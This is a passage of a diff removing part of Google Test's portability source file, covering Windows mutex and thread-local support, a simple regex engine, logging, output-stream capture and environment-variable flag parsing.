-        ::InterlockedCompareExchange(&critical_section_init_phase_, 1L, 0L)) {
-      case 0:
-        // If critical_section_init_phase_ was 0 before the exchange, we
-        // are the first to test it and need to perform the initialization.
-        owner_thread_id_ = 0;
-        critical_section_ = new CRITICAL_SECTION;
-        ::InitializeCriticalSection(critical_section_);
-        // Updates the critical_section_init_phase_ to 2 to signal
-        // initialization complete.
-        GTEST_CHECK_(::InterlockedCompareExchange(
-                          &critical_section_init_phase_, 2L, 1L) ==
-                      1L);
-        break;
-      case 1:
-        // Somebody else is already initializing the mutex; spin until they
-        // are done.
-        while (::InterlockedCompareExchange(&critical_section_init_phase_,
-                                            2L,
-                                            2L) != 2L) {
-          // Possibly yields the rest of the thread's time slice to other
-          // threads.
-          ::Sleep(0);
-        }
-        break;
-
-      case 2:
-        break;  // The mutex is already initialized and ready for use.
-
-      default:
-        GTEST_CHECK_(false)
-            << "Unexpected value of critical_section_init_phase_ "
-            << "while initializing a static mutex.";
-    }
-  }
-}
-
-namespace {
-
-class ThreadWithParamSupport : public ThreadWithParamBase {
- public:
-  static HANDLE CreateThread(Runnable* runnable,
-                             Notification* thread_can_start) {
-    ThreadMainParam* param = new ThreadMainParam(runnable, thread_can_start);
-    DWORD thread_id;
-    // TODO(yukawa): Consider to use _beginthreadex instead.
-    HANDLE thread_handle = ::CreateThread(
-        NULL,    // Default security.
-        0,       // Default stack size.
-        &ThreadWithParamSupport::ThreadMain,
-        param,   // Parameter to ThreadMainStatic
-        0x0,     // Default creation flags.
-        &thread_id);  // Need a valid pointer for the call to work under Win98.
-    GTEST_CHECK_(thread_handle != NULL) << "CreateThread failed with error "
-                                        << ::GetLastError() << ".";
-    if (thread_handle == NULL) {
-      delete param;
-    }
-    return thread_handle;
-  }
-
- private:
-  struct ThreadMainParam {
-    ThreadMainParam(Runnable* runnable, Notification* thread_can_start)
-        : runnable_(runnable),
-          thread_can_start_(thread_can_start) {
-    }
-    scoped_ptr<Runnable> runnable_;
-    // Does not own.
-    Notification* thread_can_start_;
-  };
-
-  static DWORD WINAPI ThreadMain(void* ptr) {
-    // Transfers ownership.
-    scoped_ptr<ThreadMainParam> param(static_cast<ThreadMainParam*>(ptr));
-    if (param->thread_can_start_ != NULL)
-      param->thread_can_start_->WaitForNotification();
-    param->runnable_->Run();
-    return 0;
-  }
-
-  // Prohibit instantiation.
-  ThreadWithParamSupport();
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ThreadWithParamSupport);
-};
-
-}  // namespace
-
-ThreadWithParamBase::ThreadWithParamBase(Runnable *runnable,
-                                         Notification* thread_can_start)
-      : thread_(ThreadWithParamSupport::CreateThread(runnable,
-                                                     thread_can_start)) {
-}
-
-ThreadWithParamBase::~ThreadWithParamBase() {
-  Join();
-}
-
-void ThreadWithParamBase::Join() {
-  GTEST_CHECK_(::WaitForSingleObject(thread_.Get(), INFINITE) == WAIT_OBJECT_0)
-      << "Failed to join the thread with error " << ::GetLastError() << ".";
-}
-
-// Maps a thread to a set of ThreadIdToThreadLocals that have values
-// instantiated on that thread and notifies them when the thread exits.  A
-// ThreadLocal instance is expected to persist until all threads it has
-// values on have terminated.
-class ThreadLocalRegistryImpl {
- public:
-  // Registers thread_local_instance as having value on the current thread.
-  // Returns a value that can be used to identify the thread from other threads.
-  static ThreadLocalValueHolderBase* GetValueOnCurrentThread(
-      const ThreadLocalBase* thread_local_instance) {
-    DWORD current_thread = ::GetCurrentThreadId();
-    MutexLock lock(&mutex_);
-    ThreadIdToThreadLocals* const thread_to_thread_locals =
-        GetThreadLocalsMapLocked();
-    ThreadIdToThreadLocals::iterator thread_local_pos =
-        thread_to_thread_locals->find(current_thread);
-    if (thread_local_pos == thread_to_thread_locals->end()) {
-      thread_local_pos = thread_to_thread_locals->insert(
-          std::make_pair(current_thread, ThreadLocalValues())).first;
-      StartWatcherThreadFor(current_thread);
-    }
-    ThreadLocalValues& thread_local_values = thread_local_pos->second;
-    ThreadLocalValues::iterator value_pos =
-        thread_local_values.find(thread_local_instance);
-    if (value_pos == thread_local_values.end()) {
-      value_pos =
-          thread_local_values
-              .insert(std::make_pair(
-                  thread_local_instance,
-                  linked_ptr<ThreadLocalValueHolderBase>(
-                      thread_local_instance->NewValueForCurrentThread())))
-              .first;
-    }
-    return value_pos->second.get();
-  }
-
-  static void OnThreadLocalDestroyed(
-      const ThreadLocalBase* thread_local_instance) {
-    std::vector<linked_ptr<ThreadLocalValueHolderBase> > value_holders;
-    // Clean up the ThreadLocalValues data structure while holding the lock, but
-    // defer the destruction of the ThreadLocalValueHolderBases.
-    {
-      MutexLock lock(&mutex_);
-      ThreadIdToThreadLocals* const thread_to_thread_locals =
-          GetThreadLocalsMapLocked();
-      for (ThreadIdToThreadLocals::iterator it =
-          thread_to_thread_locals->begin();
-          it != thread_to_thread_locals->end();
-          ++it) {
-        ThreadLocalValues& thread_local_values = it->second;
-        ThreadLocalValues::iterator value_pos =
-            thread_local_values.find(thread_local_instance);
-        if (value_pos != thread_local_values.end()) {
-          value_holders.push_back(value_pos->second);
-          thread_local_values.erase(value_pos);
-          // This 'if' can only be successful at most once, so theoretically we
-          // could break out of the loop here, but we don't bother doing so.
-        }
-      }
-    }
-    // Outside the lock, let the destructor for 'value_holders' deallocate the
-    // ThreadLocalValueHolderBases.
-  }
-
-  static void OnThreadExit(DWORD thread_id) {
-    GTEST_CHECK_(thread_id != 0) << ::GetLastError();
-    std::vector<linked_ptr<ThreadLocalValueHolderBase> > value_holders;
-    // Clean up the ThreadIdToThreadLocals data structure while holding the
-    // lock, but defer the destruction of the ThreadLocalValueHolderBases.
-    {
-      MutexLock lock(&mutex_);
-      ThreadIdToThreadLocals* const thread_to_thread_locals =
-          GetThreadLocalsMapLocked();
-      ThreadIdToThreadLocals::iterator thread_local_pos =
-          thread_to_thread_locals->find(thread_id);
-      if (thread_local_pos != thread_to_thread_locals->end()) {
-        ThreadLocalValues& thread_local_values = thread_local_pos->second;
-        for (ThreadLocalValues::iterator value_pos =
-            thread_local_values.begin();
-            value_pos != thread_local_values.end();
-            ++value_pos) {
-          value_holders.push_back(value_pos->second);
-        }
-        thread_to_thread_locals->erase(thread_local_pos);
-      }
-    }
-    // Outside the lock, let the destructor for 'value_holders' deallocate the
-    // ThreadLocalValueHolderBases.
-  }
-
- private:
-  // In a particular thread, maps a ThreadLocal object to its value.
-  typedef std::map<const ThreadLocalBase*,
-                   linked_ptr<ThreadLocalValueHolderBase> > ThreadLocalValues;
-  // Stores all ThreadIdToThreadLocals having values in a thread, indexed by
-  // thread's ID.
-  typedef std::map<DWORD, ThreadLocalValues> ThreadIdToThreadLocals;
-
-  // Holds the thread id and thread handle that we pass from
-  // StartWatcherThreadFor to WatcherThreadFunc.
-  typedef std::pair<DWORD, HANDLE> ThreadIdAndHandle;
-
-  static void StartWatcherThreadFor(DWORD thread_id) {
-    // The returned handle will be kept in thread_map and closed by
-    // watcher_thread in WatcherThreadFunc.
-    HANDLE thread = ::OpenThread(SYNCHRONIZE | THREAD_QUERY_INFORMATION,
-                                 FALSE,
-                                 thread_id);
-    GTEST_CHECK_(thread != NULL);
-    // We need to to pass a valid thread ID pointer into CreateThread for it
-    // to work correctly under Win98.
-    DWORD watcher_thread_id;
-    HANDLE watcher_thread = ::CreateThread(
-        NULL,   // Default security.
-        0,      // Default stack size
-        &ThreadLocalRegistryImpl::WatcherThreadFunc,
-        reinterpret_cast<LPVOID>(new ThreadIdAndHandle(thread_id, thread)),
-        CREATE_SUSPENDED,
-        &watcher_thread_id);
-    GTEST_CHECK_(watcher_thread != NULL);
-    // Give the watcher thread the same priority as ours to avoid being
-    // blocked by it.
-    ::SetThreadPriority(watcher_thread,
-                        ::GetThreadPriority(::GetCurrentThread()));
-    ::ResumeThread(watcher_thread);
-    ::CloseHandle(watcher_thread);
-  }
-
-  // Monitors exit from a given thread and notifies those
-  // ThreadIdToThreadLocals about thread termination.
-  static DWORD WINAPI WatcherThreadFunc(LPVOID param) {
-    const ThreadIdAndHandle* tah =
-        reinterpret_cast<const ThreadIdAndHandle*>(param);
-    GTEST_CHECK_(
-        ::WaitForSingleObject(tah->second, INFINITE) == WAIT_OBJECT_0);
-    OnThreadExit(tah->first);
-    ::CloseHandle(tah->second);
-    delete tah;
-    return 0;
-  }
-
-  // Returns map of thread local instances.
-  static ThreadIdToThreadLocals* GetThreadLocalsMapLocked() {
-    mutex_.AssertHeld();
-    static ThreadIdToThreadLocals* map = new ThreadIdToThreadLocals;
-    return map;
-  }
-
-  // Protects access to GetThreadLocalsMapLocked() and its return value.
-  static Mutex mutex_;
-  // Protects access to GetThreadMapLocked() and its return value.
-  static Mutex thread_map_mutex_;
-};
-
-Mutex ThreadLocalRegistryImpl::mutex_(Mutex::kStaticMutex);
-Mutex ThreadLocalRegistryImpl::thread_map_mutex_(Mutex::kStaticMutex);
-
-ThreadLocalValueHolderBase* ThreadLocalRegistry::GetValueOnCurrentThread(
-      const ThreadLocalBase* thread_local_instance) {
-  return ThreadLocalRegistryImpl::GetValueOnCurrentThread(
-      thread_local_instance);
-}
-
-void ThreadLocalRegistry::OnThreadLocalDestroyed(
-      const ThreadLocalBase* thread_local_instance) {
-  ThreadLocalRegistryImpl::OnThreadLocalDestroyed(thread_local_instance);
-}
-
-#endif  // GTEST_IS_THREADSAFE && GTEST_OS_WINDOWS
-
-#if GTEST_USES_POSIX_RE
-
-// Implements RE.  Currently only needed for death tests.
-
-RE::~RE() {
-  if (is_valid_) {
-    // regfree'ing an invalid regex might crash because the content
-    // of the regex is undefined. Since the regex's are essentially
-    // the same, one cannot be valid (or invalid) without the other
-    // being so too.
-    regfree(&partial_regex_);
-    regfree(&full_regex_);
-  }
-  free(const_cast<char*>(pattern_));
-}
-
-// Returns true iff regular expression re matches the entire str.
-bool RE::FullMatch(const char* str, const RE& re) {
-  if (!re.is_valid_) return false;
-
-  regmatch_t match;
-  return regexec(&re.full_regex_, str, 1, &match, 0) == 0;
-}
-
-// Returns true iff regular expression re matches a substring of str
-// (including str itself).
-bool RE::PartialMatch(const char* str, const RE& re) {
-  if (!re.is_valid_) return false;
-
-  regmatch_t match;
-  return regexec(&re.partial_regex_, str, 1, &match, 0) == 0;
-}
-
-// Initializes an RE from its string representation.
-void RE::Init(const char* regex) {
-  pattern_ = posix::StrDup(regex);
-
-  // Reserves enough bytes to hold the regular expression used for a
-  // full match.
-  const size_t full_regex_len = strlen(regex) + 10;
-  char* const full_pattern = new char[full_regex_len];
-
-  snprintf(full_pattern, full_regex_len, "^(%s)$", regex);
-  is_valid_ = regcomp(&full_regex_, full_pattern, REG_EXTENDED) == 0;
-  // We want to call regcomp(&partial_regex_, ...) even if the
-  // previous expression returns false.  Otherwise partial_regex_ may
-  // not be properly initialized can may cause trouble when it's
-  // freed.
-  //
-  // Some implementation of POSIX regex (e.g. on at least some
-  // versions of Cygwin) doesn't accept the empty string as a valid
-  // regex.  We change it to an equivalent form "()" to be safe.
-  if (is_valid_) {
-    const char* const partial_regex = (*regex == '\0') ? "()" : regex;
-    is_valid_ = regcomp(&partial_regex_, partial_regex, REG_EXTENDED) == 0;
-  }
-  EXPECT_TRUE(is_valid_)
-      << "Regular expression \"" << regex
-      << "\" is not a valid POSIX Extended regular expression.";
-
-  delete[] full_pattern;
-}
-
-#elif GTEST_USES_SIMPLE_RE
-
-// Returns true iff ch appears anywhere in str (excluding the
-// terminating '\0' character).
-bool IsInSet(char ch, const char* str) {
-  return ch != '\0' && strchr(str, ch) != NULL;
-}
-
-// Returns true iff ch belongs to the given classification.  Unlike
-// similar functions in <ctype.h>, these aren't affected by the
-// current locale.
-bool IsAsciiDigit(char ch) { return '0' <= ch && ch <= '9'; }
-bool IsAsciiPunct(char ch) {
-  return IsInSet(ch, "^-!\"#$%&'()*+,./:;<=>?@[\\]_`{|}~");
-}
-bool IsRepeat(char ch) { return IsInSet(ch, "?*+"); }
-bool IsAsciiWhiteSpace(char ch) { return IsInSet(ch, " \f\n\r\t\v"); }
-bool IsAsciiWordChar(char ch) {
-  return ('a' <= ch && ch <= 'z') || ('A' <= ch && ch <= 'Z') ||
-      ('0' <= ch && ch <= '9') || ch == '_';
-}
-
-// Returns true iff "\\c" is a supported escape sequence.
-bool IsValidEscape(char c) {
-  return (IsAsciiPunct(c) || IsInSet(c, "dDfnrsStvwW"));
-}
-
-// Returns true iff the given atom (specified by escaped and pattern)
-// matches ch.  The result is undefined if the atom is invalid.
-bool AtomMatchesChar(bool escaped, char pattern_char, char ch) {
-  if (escaped) {  // "\\p" where p is pattern_char.
-    switch (pattern_char) {
-      case 'd': return IsAsciiDigit(ch);
-      case 'D': return !IsAsciiDigit(ch);
-      case 'f': return ch == '\f';
-      case 'n': return ch == '\n';
-      case 'r': return ch == '\r';
-      case 's': return IsAsciiWhiteSpace(ch);
-      case 'S': return !IsAsciiWhiteSpace(ch);
-      case 't': return ch == '\t';
-      case 'v': return ch == '\v';
-      case 'w': return IsAsciiWordChar(ch);
-      case 'W': return !IsAsciiWordChar(ch);
-    }
-    return IsAsciiPunct(pattern_char) && pattern_char == ch;
-  }
-
-  return (pattern_char == '.' && ch != '\n') || pattern_char == ch;
-}
-
-// Helper function used by ValidateRegex() to format error messages.
-std::string FormatRegexSyntaxError(const char* regex, int index) {
-  return (Message() << "Syntax error at index " << index
-          << " in simple regular expression \"" << regex << "\": ").GetString();
-}
-
-// Generates non-fatal failures and returns false if regex is invalid;
-// otherwise returns true.
-bool ValidateRegex(const char* regex) {
-  if (regex == NULL) {
-    // TODO(wan@google.com): fix the source file location in the
-    // assertion failures to match where the regex is used in user
-    // code.
-    ADD_FAILURE() << "NULL is not a valid simple regular expression.";
-    return false;
-  }
-
-  bool is_valid = true;
-
-  // True iff ?, *, or + can follow the previous atom.
-  bool prev_repeatable = false;
-  for (int i = 0; regex[i]; i++) {
-    if (regex[i] == '\\') {  // An escape sequence
-      i++;
-      if (regex[i] == '\0') {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i - 1)
-                      << "'\\' cannot appear at the end.";
-        return false;
-      }
-
-      if (!IsValidEscape(regex[i])) {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i - 1)
-                      << "invalid escape sequence \"\\" << regex[i] << "\".";
-        is_valid = false;
-      }
-      prev_repeatable = true;
-    } else {  // Not an escape sequence.
-      const char ch = regex[i];
-
-      if (ch == '^' && i > 0) {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i)
-                      << "'^' can only appear at the beginning.";
-        is_valid = false;
-      } else if (ch == '$' && regex[i + 1] != '\0') {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i)
-                      << "'$' can only appear at the end.";
-        is_valid = false;
-      } else if (IsInSet(ch, "()[]{}|")) {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i)
-                      << "'" << ch << "' is unsupported.";
-        is_valid = false;
-      } else if (IsRepeat(ch) && !prev_repeatable) {
-        ADD_FAILURE() << FormatRegexSyntaxError(regex, i)
-                      << "'" << ch << "' can only follow a repeatable token.";
-        is_valid = false;
-      }
-
-      prev_repeatable = !IsInSet(ch, "^$?*+");
-    }
-  }
-
-  return is_valid;
-}
-
-// Matches a repeated regex atom followed by a valid simple regular
-// expression.  The regex atom is defined as c if escaped is false,
-// or \c otherwise.  repeat is the repetition meta character (?, *,
-// or +).  The behavior is undefined if str contains too many
-// characters to be indexable by size_t, in which case the test will
-// probably time out anyway.  We are fine with this limitation as
-// std::string has it too.
-bool MatchRepetitionAndRegexAtHead(
-    bool escaped, char c, char repeat, const char* regex,
-    const char* str) {
-  const size_t min_count = (repeat == '+') ? 1 : 0;
-  const size_t max_count = (repeat == '?') ? 1 :
-      static_cast<size_t>(-1) - 1;
-  // We cannot call numeric_limits::max() as it conflicts with the
-  // max() macro on Windows.
-
-  for (size_t i = 0; i <= max_count; ++i) {
-    // We know that the atom matches each of the first i characters in str.
-    if (i >= min_count && MatchRegexAtHead(regex, str + i)) {
-      // We have enough matches at the head, and the tail matches too.
-      // Since we only care about *whether* the pattern matches str
-      // (as opposed to *how* it matches), there is no need to find a
-      // greedy match.
-      return true;
-    }
-    if (str[i] == '\0' || !AtomMatchesChar(escaped, c, str[i]))
-      return false;
-  }
-  return false;
-}
-
-// Returns true iff regex matches a prefix of str.  regex must be a
-// valid simple regular expression and not start with "^", or the
-// result is undefined.
-bool MatchRegexAtHead(const char* regex, const char* str) {
-  if (*regex == '\0')  // An empty regex matches a prefix of anything.
-    return true;
-
-  // "$" only matches the end of a string.  Note that regex being
-  // valid guarantees that there's nothing after "$" in it.
-  if (*regex == '$')
-    return *str == '\0';
-
-  // Is the first thing in regex an escape sequence?
-  const bool escaped = *regex == '\\';
-  if (escaped)
-    ++regex;
-  if (IsRepeat(regex[1])) {
-    // MatchRepetitionAndRegexAtHead() calls MatchRegexAtHead(), so
-    // here's an indirect recursion.  It terminates as the regex gets
-    // shorter in each recursion.
-    return MatchRepetitionAndRegexAtHead(
-        escaped, regex[0], regex[1], regex + 2, str);
-  } else {
-    // regex isn't empty, isn't "$", and doesn't start with a
-    // repetition.  We match the first atom of regex with the first
-    // character of str and recurse.
-    return (*str != '\0') && AtomMatchesChar(escaped, *regex, *str) &&
-        MatchRegexAtHead(regex + 1, str + 1);
-  }
-}
-
-// Returns true iff regex matches any substring of str.  regex must be
-// a valid simple regular expression, or the result is undefined.
-//
-// The algorithm is recursive, but the recursion depth doesn't exceed
-// the regex length, so we won't need to worry about running out of
-// stack space normally.  In rare cases the time complexity can be
-// exponential with respect to the regex length + the string length,
-// but usually it's must faster (often close to linear).
-bool MatchRegexAnywhere(const char* regex, const char* str) {
-  if (regex == NULL || str == NULL)
-    return false;
-
-  if (*regex == '^')
-    return MatchRegexAtHead(regex + 1, str);
-
-  // A successful match can be anywhere in str.
-  do {
-    if (MatchRegexAtHead(regex, str))
-      return true;
-  } while (*str++ != '\0');
-  return false;
-}
-
-// Implements the RE class.
-
-RE::~RE() {
-  free(const_cast<char*>(pattern_));
-  free(const_cast<char*>(full_pattern_));
-}
-
-// Returns true iff regular expression re matches the entire str.
-bool RE::FullMatch(const char* str, const RE& re) {
-  return re.is_valid_ && MatchRegexAnywhere(re.full_pattern_, str);
-}
-
-// Returns true iff regular expression re matches a substring of str
-// (including str itself).
-bool RE::PartialMatch(const char* str, const RE& re) {
-  return re.is_valid_ && MatchRegexAnywhere(re.pattern_, str);
-}
-
-// Initializes an RE from its string representation.
-void RE::Init(const char* regex) {
-  pattern_ = full_pattern_ = NULL;
-  if (regex != NULL) {
-    pattern_ = posix::StrDup(regex);
-  }
-
-  is_valid_ = ValidateRegex(regex);
-  if (!is_valid_) {
-    // No need to calculate the full pattern when the regex is invalid.
-    return;
-  }
-
-  const size_t len = strlen(regex);
-  // Reserves enough bytes to hold the regular expression used for a
-  // full match: we need space to prepend a '^', append a '$', and
-  // terminate the string with '\0'.
-  char* buffer = static_cast<char*>(malloc(len + 3));
-  full_pattern_ = buffer;
-
-  if (*regex != '^')
-    *buffer++ = '^';  // Makes sure full_pattern_ starts with '^'.
-
-  // We don't use snprintf or strncpy, as they trigger a warning when
-  // compiled with VC++ 8.0.
-  memcpy(buffer, regex, len);
-  buffer += len;
-
-  if (len == 0 || regex[len - 1] != '$')
-    *buffer++ = '$';  // Makes sure full_pattern_ ends with '$'.
-
-  *buffer = '\0';
-}
-
-#endif  // GTEST_USES_POSIX_RE
-
-const char kUnknownFile[] = "unknown file";
-
-// Formats a source file path and a line number as they would appear
-// in an error message from the compiler used to compile this code.
-GTEST_API_ ::std::string FormatFileLocation(const char* file, int line) {
-  const std::string file_name(file == NULL ? kUnknownFile : file);
-
-  if (line < 0) {
-    return file_name + ":";
-  }
-#ifdef _MSC_VER
-  return file_name + "(" + StreamableToString(line) + "):";
-#else
-  return file_name + ":" + StreamableToString(line) + ":";
-#endif  // _MSC_VER
-}
-
-// Formats a file location for compiler-independent XML output.
-// Although this function is not platform dependent, we put it next to
-// FormatFileLocation in order to contrast the two functions.
-// Note that FormatCompilerIndependentFileLocation() does NOT append colon
-// to the file location it produces, unlike FormatFileLocation().
-GTEST_API_ ::std::string FormatCompilerIndependentFileLocation(
-    const char* file, int line) {
-  const std::string file_name(file == NULL ? kUnknownFile : file);
-
-  if (line < 0)
-    return file_name;
-  else
-    return file_name + ":" + StreamableToString(line);
-}
-
-
-GTestLog::GTestLog(GTestLogSeverity severity, const char* file, int line)
-    : severity_(severity) {
-  const char* const marker =
-      severity == GTEST_INFO ?    "[  INFO ]" :
-      severity == GTEST_WARNING ? "[WARNING]" :
-      severity == GTEST_ERROR ?   "[ ERROR ]" : "[ FATAL ]";
-  GetStream() << ::std::endl << marker << " "
-              << FormatFileLocation(file, line).c_str() << ": ";
-}
-
-// Flushes the buffers and, if severity is GTEST_FATAL, aborts the program.
-GTestLog::~GTestLog() {
-  GetStream() << ::std::endl;
-  if (severity_ == GTEST_FATAL) {
-    fflush(stderr);
-    posix::Abort();
-  }
-}
-// Disable Microsoft deprecation warnings for POSIX functions called from
-// this class (creat, dup, dup2, and close)
-GTEST_DISABLE_MSC_WARNINGS_PUSH_(4996)
-
-#if GTEST_HAS_STREAM_REDIRECTION
-
-// Object that captures an output stream (stdout/stderr).
-class CapturedStream {
- public:
-  // The ctor redirects the stream to a temporary file.
-  explicit CapturedStream(int fd) : fd_(fd), uncaptured_fd_(dup(fd)) {
-# if GTEST_OS_WINDOWS
-    char temp_dir_path[MAX_PATH + 1] = { '\0' };  // NOLINT
-    char temp_file_path[MAX_PATH + 1] = { '\0' };  // NOLINT
-
-    ::GetTempPathA(sizeof(temp_dir_path), temp_dir_path);
-    const UINT success = ::GetTempFileNameA(temp_dir_path,
-                                            "gtest_redir",
-                                            0,  // Generate unique file name.
-                                            temp_file_path);
-    GTEST_CHECK_(success != 0)
-        << "Unable to create a temporary file in " << temp_dir_path;
-    const int captured_fd = creat(temp_file_path, _S_IREAD | _S_IWRITE);
-    GTEST_CHECK_(captured_fd != -1) << "Unable to open temporary file "
-                                    << temp_file_path;
-    filename_ = temp_file_path;
-# else
-    // There's no guarantee that a test has write access to the current
-    // directory, so we create the temporary file in the /tmp directory
-    // instead. We use /tmp on most systems, and /sdcard on Android.
-    // That's because Android doesn't have /tmp.
-#  if GTEST_OS_LINUX_ANDROID
-    // Note: Android applications are expected to call the framework's
-    // Context.getExternalStorageDirectory() method through JNI to get
-    // the location of the world-writable SD Card directory. However,
-    // this requires a Context handle, which cannot be retrieved
-    // globally from native code. Doing so also precludes running the
-    // code as part of a regular standalone executable, which doesn't
-    // run in a Dalvik process (e.g. when running it through 'adb shell').
-    //
-    // The location /sdcard is directly accessible from native code
-    // and is the only location (unofficially) supported by the Android
-    // team. It's generally a symlink to the real SD Card mount point
-    // which can be /mnt/sdcard, /mnt/sdcard0, /system/media/sdcard, or
-    // other OEM-customized locations. Never rely on these, and always
-    // use /sdcard.
-    char name_template[] = "/sdcard/gtest_captured_stream.XXXXXX";
-#  else
-    char name_template[] = "/tmp/captured_stream.XXXXXX";
-#  endif  // GTEST_OS_LINUX_ANDROID
-    const int captured_fd = mkstemp(name_template);
-    filename_ = name_template;
-# endif  // GTEST_OS_WINDOWS
-    fflush(NULL);
-    dup2(captured_fd, fd_);
-    close(captured_fd);
-  }
-
-  ~CapturedStream() {
-    remove(filename_.c_str());
-  }
-
-  std::string GetCapturedString() {
-    if (uncaptured_fd_ != -1) {
-      // Restores the original stream.
-      fflush(NULL);
-      dup2(uncaptured_fd_, fd_);
-      close(uncaptured_fd_);
-      uncaptured_fd_ = -1;
-    }
-
-    FILE* const file = posix::FOpen(filename_.c_str(), "r");
-    const std::string content = ReadEntireFile(file);
-    posix::FClose(file);
-    return content;
-  }
-
- private:
-  // Reads the entire content of a file as an std::string.
-  static std::string ReadEntireFile(FILE* file);
-
-  // Returns the size (in bytes) of a file.
-  static size_t GetFileSize(FILE* file);
-
-  const int fd_;  // A stream to capture.
-  int uncaptured_fd_;
-  // Name of the temporary file holding the stderr output.
-  ::std::string filename_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(CapturedStream);
-};
-
-// Returns the size (in bytes) of a file.
-size_t CapturedStream::GetFileSize(FILE* file) {
-  fseek(file, 0, SEEK_END);
-  return static_cast<size_t>(ftell(file));
-}
-
-// Reads the entire content of a file as a string.
-std::string CapturedStream::ReadEntireFile(FILE* file) {
-  const size_t file_size = GetFileSize(file);
-  char* const buffer = new char[file_size];
-
-  size_t bytes_last_read = 0;  // # of bytes read in the last fread()
-  size_t bytes_read = 0;       // # of bytes read so far
-
-  fseek(file, 0, SEEK_SET);
-
-  // Keeps reading the file until we cannot read further or the
-  // pre-determined file size is reached.
-  do {
-    bytes_last_read = fread(buffer+bytes_read, 1, file_size-bytes_read, file);
-    bytes_read += bytes_last_read;
-  } while (bytes_last_read > 0 && bytes_read < file_size);
-
-  const std::string content(buffer, bytes_read);
-  delete[] buffer;
-
-  return content;
-}
-
-GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-static CapturedStream* g_captured_stderr = NULL;
-static CapturedStream* g_captured_stdout = NULL;
-
-// Starts capturing an output stream (stdout/stderr).
-void CaptureStream(int fd, const char* stream_name, CapturedStream** stream) {
-  if (*stream != NULL) {
-    GTEST_LOG_(FATAL) << "Only one " << stream_name
-                      << " capturer can exist at a time.";
-  }
-  *stream = new CapturedStream(fd);
-}
-
-// Stops capturing the output stream and returns the captured string.
-std::string GetCapturedStream(CapturedStream** captured_stream) {
-  const std::string content = (*captured_stream)->GetCapturedString();
-
-  delete *captured_stream;
-  *captured_stream = NULL;
-
-  return content;
-}
-
-// Starts capturing stdout.
-void CaptureStdout() {
-  CaptureStream(kStdOutFileno, "stdout", &g_captured_stdout);
-}
-
-// Starts capturing stderr.
-void CaptureStderr() {
-  CaptureStream(kStdErrFileno, "stderr", &g_captured_stderr);
-}
-
-// Stops capturing stdout and returns the captured string.
-std::string GetCapturedStdout() {
-  return GetCapturedStream(&g_captured_stdout);
-}
-
-// Stops capturing stderr and returns the captured string.
-std::string GetCapturedStderr() {
-  return GetCapturedStream(&g_captured_stderr);
-}
-
-#endif  // GTEST_HAS_STREAM_REDIRECTION
-
-#if GTEST_HAS_DEATH_TEST
-
-// A copy of all command line arguments.  Set by InitGoogleTest().
-::std::vector<testing::internal::string> g_argvs;
-
-static const ::std::vector<testing::internal::string>* g_injected_test_argvs =
-                                        NULL;  // Owned.
-
-void SetInjectableArgvs(const ::std::vector<testing::internal::string>* argvs) {
-  if (g_injected_test_argvs != argvs)
-    delete g_injected_test_argvs;
-  g_injected_test_argvs = argvs;
-}
-
-const ::std::vector<testing::internal::string>& GetInjectableArgvs() {
-  if (g_injected_test_argvs != NULL) {
-    return *g_injected_test_argvs;
-  }
-  return g_argvs;
-}
-#endif  // GTEST_HAS_DEATH_TEST
-
-#if GTEST_OS_WINDOWS_MOBILE
-namespace posix {
-void Abort() {
-  DebugBreak();
-  TerminateProcess(GetCurrentProcess(), 1);
-}
-}  // namespace posix
-#endif  // GTEST_OS_WINDOWS_MOBILE
-
-// Returns the name of the environment variable corresponding to the
-// given flag.  For example, FlagToEnvVar("foo") will return
-// "GTEST_FOO" in the open-source version.
-static std::string FlagToEnvVar(const char* flag) {
-  const std::string full_flag =
-      (Message() << GTEST_FLAG_PREFIX_ << flag).GetString();
-
-  Message env_var;
-  for (size_t i = 0; i != full_flag.length(); i++) {
-    env_var << ToUpper(full_flag.c_str()[i]);
-  }
-
-  return env_var.GetString();
-}
-
-// Parses 'str' for a 32-bit signed integer.  If successful, writes
-// the result to *value and returns true; otherwise leaves *value
-// unchanged and returns false.
-bool ParseInt32(const Message& src_text, const char* str, Int32* value) {
-  // Parses the environment variable as a decimal integer.
-  char* end = NULL;
-  const long long_value = strtol(str, &end, 10);  // NOLINT
-
-  // Has strtol() consumed all characters in the string?
-  if (*end != '\0') {
-    // No - an invalid character was encountered.
-    Message msg;
-    msg << "WARNING: " << src_text
-        << " is expected to be a 32-bit integer, but actually"
-        << " has value \"" << str << "\".\n";
-    printf("%s", msg.GetString().c_str());
-    fflush(stdout);
-    return false;
-  }
-
-  // Is the parsed value in the range of an Int32?
-  const Int32 result = static_cast<Int32>(long_value);
-  if (long_value == LONG_MAX || long_value == LONG_MIN ||
-      // The parsed value overflows as a long.  (strtol() returns
-      // LONG_MAX or LONG_MIN when the input overflows.)
-      result != long_value
-      // The parsed value overflows as an Int32.
-      ) {
-    Message msg;
-    msg << "WARNING: " << src_text
-        << " is expected to be a 32-bit integer, but actually"
-        << " has value " << str << ", which overflows.\n";
-    printf("%s", msg.GetString().c_str());
-    fflush(stdout);
-    return false;
-  }
-
-  *value = result;
-  return true;
-}
-
-// Reads and returns the Boolean environment variable corresponding to
-// the given flag; if it's not set, returns default_value.
-//
-// The value is considered true iff it's not "0".
-bool BoolFromGTestEnv(const char* flag, bool default_value) {
-  const std::string env_var = FlagToEnvVar(flag);
-  const char* const string_value = posix::GetEnv(env_var.c_str());
-  return string_value == NULL ?
-      default_value : strcmp(string_value, "0") != 0;
-}
-
-// Reads and returns a 32-bit integer stored in the environment
-// variable corresponding to the given flag; if it isn't set or
-// doesn't represent a valid 32-bit integer, returns default_value.
-Int32 Int32FromGTestEnv(const char* flag, Int32 default_value) {
-  const std::string env_var = FlagToEnvVar(flag);
-  const char* const string_value = posix::GetEnv(env_var.c_str());
-  if (string_value == NULL) {
-    // The environment variable is not set.
-    return default_value;
-  }
-
-  Int32 result = default_value;
-  if (!ParseInt32(Message() << "Environment variable " << env_var,
-                  string_value, &result)) {
-    printf("The default value %s is used.\n",
-           (Message() << default_value).GetString().c_str());
-    fflush(stdout);
-    return default_value;
-  }
-
-  return result;
-}
-
